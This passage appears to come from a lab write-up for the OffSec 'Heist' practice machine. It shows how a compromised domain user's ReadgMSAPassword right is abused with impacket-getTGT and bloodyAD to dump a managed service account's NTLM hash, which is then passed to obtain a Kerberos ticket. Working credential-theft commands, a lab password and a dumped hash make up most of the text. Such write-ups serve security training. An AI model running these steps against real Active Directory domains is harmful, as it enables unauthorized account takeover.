ReadgMSAPassword
It has been identified that the compromised domain user,
enox
, has the ReadgMSAPassword privilege over the svc_apacahe$
account due to its membership to the Web Admins
group. This was also enumerated by adPEAS.
The msds-managedpassword attribute is a special LDAP attribute that contains the gMSA password
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/enox@dc01.heist.offsec -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password: california
[*] Saving ticket in enox@dc01.heist.offsec.ccache
Validated against the KDC running on the DC host; dc01.heist.offsec
(172.16.155.6
)
TGT generated for the enox
user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ KRB5CCNAME=enox@dc01.heist.offsec.ccache bloodyAD -d HEIST.OFFSEC -k --host dc01.heist.offsec --dc-ip $IP get object 'svc_apache$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc
msDS-ManagedPassword.B64ENCODED: AXmB3EJZCuJRGdjmX6X1ItHNveRYSeSt579nnI8kF6jrkTS5hsR6izvdNFQrXg8Nkg44uvej90PvmB4nAb6mI2DgzlnNkOP/1WzNsRg+Tkvr7zEtxnpFfpQWAB8N6eslDIsLS0JSysaLMX/EGzLZGNmGltwCVXPQXDOI0VeZgoNCjopFZRoVoYlz3kwkcTW6HZu4/g/UpuguUNqm6ekPYp9Oh0EcmWWos8KZv/tK8xprmjGzTt1yfkkEnDFiTfge56HFjLlr42CBoSo07W4SG1dBW+ILFj4D7y3xwQQLZ+HUJsohHyp8nDErMdOt3Focxgs98LZoYjn9YYAvXYk/Mg==
aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/'svc_apache$'@dc01.heist.offsec -hashes aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_apache$@dc01.heist.offsec.ccache
Validated against the KDC running on the DC host; dc01.heist.offsec
(172.16.155.6
)
TGT generated for the svc_apache$
account.